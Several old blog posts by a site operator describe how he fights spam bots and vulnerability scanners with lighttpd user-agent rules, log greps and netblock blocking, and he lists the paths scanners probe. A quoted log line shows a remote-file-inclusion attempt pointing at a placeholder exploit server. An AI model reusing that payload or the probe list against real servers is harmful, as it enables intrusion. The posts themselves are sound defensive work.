White listing User Agents to combat Spam Bots and Scrapers
Posted 2008-03-21 in Spam by Johann.
IncrediBill mentioned white listing user agents to block spam bots and other types of abusers. I then tried white listing as an alternative to the black listing I had been doing before.
Here is a short explanation of the difference between black listing and white listing.
Black listing
Black listing means rejecting all requests that fit into a certain pattern.
Black listing looks like this in my web server configuration:
$HTTP["useragent"] =~ "(bad_bot|comment spammer|spambot 1)" { url.access-deny = ( "" ) }
This means that all user agent strings containing bad_bot, comment spammer or spambot 1 are served a 403 Forbidden error message.
White listing
White listing means rejecting all requests that do not fit a certain pattern.
White listing looks as follows in my configuration:
$HTTP["useragent"] !~ "^(Mozilla|Opera)" { url.access-deny = ( "" ) }
This means that only user agent strings starting with Mozilla or Opera are allowed; everything else is served a 403 Forbidden error message.
The downside of white listing is that the number of allowed user agents can be very large. As an example, user agents of Motorola cell phones start with Motorola-, but some also start with MOT-, MOTOROKR or even motorazr.
Right now, I have more than 100 rules in my white list regular expression.
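To give an idea of what such a whitelist looks like, here is a sketch in the same lighttpd syntax that also admits the Motorola prefixes mentioned above (the exact alternation you need has to come from your own log files):

```
$HTTP["useragent"] !~ "^(Mozilla|Opera|Motorola-|MOT-|MOTOROKR|motorazr)" { url.access-deny = ( "" ) }
```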
Which one is right for me?
I recommend using black lists if you cannot spend much time reading log files and changing your web server’s configuration. Black listing, combined with IP blocking of known abusers, can still be effective in limiting bandwidth theft.
Black listing, however, will not protect you against future bad bots and reincarnations of Russian email harvester outfits. This is where white listing is better.
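Combined with the user agent rule from above, IP blocking can be expressed in the same lighttpd configuration style (a sketch; the netblock here is a documentation placeholder, not a known abuser):

```
# Deny known bad user agents.
$HTTP["useragent"] =~ "(bad_bot|comment spammer|spambot 1)" { url.access-deny = ( "" ) }
# Deny a known abuser's netblock (placeholder range).
$HTTP["remoteip"] == "192.0.2.0/24" { url.access-deny = ( "" ) }
```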
Exploit and Vulnerability Scanners using libwww-perl
Posted 2008-08-21 in Spam by Johann.
One of the stranger things I see is people scanning for vulnerable servers who always use the same libwww-perl user agent, as in this example:
… "GET /inc/irayofuncs.php?irayodirhack=http://<sploit server>/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805" "-"
These people definitely come around:
$ grep -c '"libwww-perl' <this week’s log>
111
With the exception of the following outfit, libwww-perl is used only for vulnerability scanning and exploiting of servers.
$ grep '"libwww-perl' <log> | grep -v http
96.244.75.34 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
70.88.158.109 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
Obviously, the first thing you should do is white list user agents so that none of the libwww-perl dirt can slip through and hack your server.
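If you only want a targeted rule, the default libwww-perl agent can also be denied directly (same lighttpd syntax as above; note this only catches scanners that keep the default user agent string):

```
$HTTP["useragent"] =~ "^libwww-perl" { url.access-deny = ( "" ) }
```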
Statistics
The next thing is to take a look at where this scanning is coming from. I am using the last half year of my log files here.
Requests | IP address/Hostname | Hosting | Description
113 | | Site5 hosting, Net Access Corporation, US |
63 | | Level3, US |
46 | | netdirekt e. K., DE |
41 | | netdirekt e. K., DE |
40 | | Zaklady Tworzyw Sztucznych Erg-Bierun S.A., PL |
35 | | Commerical Collocation Ltd, UK |
31 | | Cabovisao SA, PT |
29 | | Ravand CyberTech Inc, Performance Systems International Inc., US |
27 | | Hosteurope GmbH, DE |
27 | | VIF Internet, CA |
As you can see, the IP addresses are all over the place, both geographically and in what they’re used for. Also, 113 requests in half a year isn’t much, so each system either runs at a stealthy low scanning rate (unlikely) or the scanner processes are discovered sooner or later and the security holes are plugged (more likely).
I haven’t had one of my servers hacked, but one thing I would like to find out is whether these computers are exploited beyond the vulnerability scanning.
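The per-address tallies above can be reproduced with a standard pipeline (a sketch; the file name access.log and the combined log format, with the client IP in the first field, are assumptions):

```shell
# Tally requests per client IP for every log line that mentions
# libwww-perl, busiest addresses first. The access log is assumed
# to be in common/combined format, where the client IP is field 1.
grep '"libwww-perl' access.log \
  | awk '{print $1}' \
  | sort \
  | uniq -c \
  | sort -rn
```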
Websense and how to Block Websense’s Constant Abuse
Posted 2008-08-26 in Spam by Johann.
Websense, Inc. is one of the busiest net abusers. Their stealth scanning never stops.
208.80.193.26 … "GET / HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 3304; SV1; .NET CLR 1.1.4322)" "-" 208.80.193.37 … "GET /blog/music/ HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Dealio Toolbar 3.1.1; Zango 10.0.370.0)" "-"
If you go through your own log files, you’ll notice that Websense never uses the same user agent twice (simply to never show up in statistics). Here’s how aggressive Websense is:
$ nice gunzip -c <five weeks of log files> | egrep -c '^208.80.19'
414
Over 400 requests in five weeks make Websense a lot more aggressive than vulnerability scanners and forum scanners.
Primarily, the abuse is coming from 208.80.193.0/24.
$ nice gunzip -c <five weeks of log files> | egrep '^208.80.19' | awk '{print($1)}' | sort | uniq -c | sort -r -n
  35 208.80.193.31
  34 208.80.193.44
  33 208.80.193.33
  30 208.80.193.27
  25 208.80.193.37
  25 208.80.193.32
  22 208.80.193.46
  22 208.80.193.30
  21 208.80.193.35
  20 208.80.193.42
  19 208.80.193.45
  18 208.80.193.29
  16 208.80.193.39
  15 208.80.193.40
  14 208.80.193.48
  14 208.80.193.34
  12 208.80.193.47
  11 208.80.193.36
   6 208.80.193.41
   6 208.80.193.38
   5 208.80.193.26
   4 208.80.193.59
   4 208.80.193.50
   2 208.80.193.54
   1 208.80.193.43
Block Websense
Here are Websense’s netblocks. Block all of them.
66.194.6.0/24
67.117.201.128
91.194.158.0/23
192.132.210.0/24
204.15.64.0/21
208.80.192.0/21
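These can be denied at the web server level with lighttpd’s remoteip conditional, which accepts CIDR notation (a sketch showing two of the ranges; blocking at the firewall instead saves your server the TCP handshake):

```
$HTTP["remoteip"] == "208.80.192.0/21" { url.access-deny = ( "" ) }
$HTTP["remoteip"] == "204.15.64.0/21" { url.access-deny = ( "" ) }
```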
“Toata dragostea mea pentru” Vulnerability Scanners
Posted 2009-01-16 in Spam by Johann.
I have many visits from people who are interested in vulnerability scanners, whether libwww-perl
or the “Toata dragostea mea pentru diavola” scanners.
Requests
Here are all requests made by them. They have since changed their user agent to something cloaked – their latest one is
62.75.224.201 … "GET /roundcubemail-0.1/bin/msgimport HTTP/1.1" 403 4131 "-" "Toata dragostea mea pentru god (god is a girl and this is not a pbot or a browser)"
I wonder what they were smoking…
/bin/configure?action=image
/bin/msgimport
/bt/login_page.php
/bug/login_page.php
/bugs/login_page.php
/bugtrack/login_page.php
/bugtracker/login_page.php
/cgi-bin/configure?action=image
/cube/bin/msgimport
/domain_default_page/index.html
/email/program/js/list.js
/issue/login_page.php
/issuetracker/login_page.php
/login_page.php
/mail/bin/msgimport
/mail/program/js/list.js
/mail/roundcube/bin/msgimport
/mantis/login_page.php
/mantisbt/login_page.php
/msgimport
/portal/login_page.php
/program/js/list.js
/projects/login_page.php
/rc/bin/msgimport
/rc/program/js/list.js
/round/bin/msgimport
/roundcube-0.1/bin/msgimport
/roundcube//bin/msgimport
/roundcube/bin/msgimport
/roundcube/program/js/list.js
/roundcubemail-0.1/bin/msgimport
/roundcubemail-0.2/bin/msgimport
/roundcubemail/bin/msgimport
/roundcubemail/program/js/list.js
/roundcubewebmail/bin/msgimport
/support/login_page.php
/tag/configure?action=image
/tracker/login_page.php
/twiki/bin/configure?action=image
/vhcs/domain_default_page/index.html
/vhcs2/domain_default_page/index.html
/webmail/bin/msgimport
/webmail/program/js/list.js
/webmail/roundcube/bin/msgimport
/wiki/bin/configure?action=image
/wiki/cgi-bin/configure?action=image
/wiki/cgi/configure?action=image
/wikis/bin/configure?action=image
HTTP/1.1
The last line is not a mistake – their code just makes malformed HTTP requests. They also do not send any host headers with the requests. In other words, they do not have a list of domains they’re scanning, just IP addresses. Maybe not even that.
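The list of probed paths above can be pulled out of the logs with a pipeline along these lines (a sketch; the file name access.log and the combined log format, with the request path in field 7, are assumptions):

```shell
# List the distinct paths probed by the "Toata dragostea" scanner.
# With the combined log format, awk's default field splitting puts
# the request path in field 7.
grep 'Toata dragostea' access.log | awk '{print $7}' | sort -u
```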
Targets
Just by going through the list of requests, we can see
- webmail systems,
- bug tracking software,
- Wikis and
- unspecified login pages.
Tips
How can you harden your web server against these attacks?
- No default paths. Never install web applications in default paths suggested by installation instructions.
- Remove footprints. Most web applications leave notes in the HTML. “Powered by WordPress” is a very common one. Make sure you remove the most obvious hints.
- No default web sites. Make sure a host header is required. Try wget -d http://<your IP address>. You should not get your home page back.
- Have a strategy for other types of web abuse. Spamtraps, the ability to block by IP netblock and user agent, firewalls.
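The host header tip can be enforced in lighttpd along these lines (a sketch; example.com stands in for your own domain, and requests for any other, or missing, host name are denied):

```
$HTTP["host"] !~ "^(www\.)?example\.com$" { url.access-deny = ( "" ) }
```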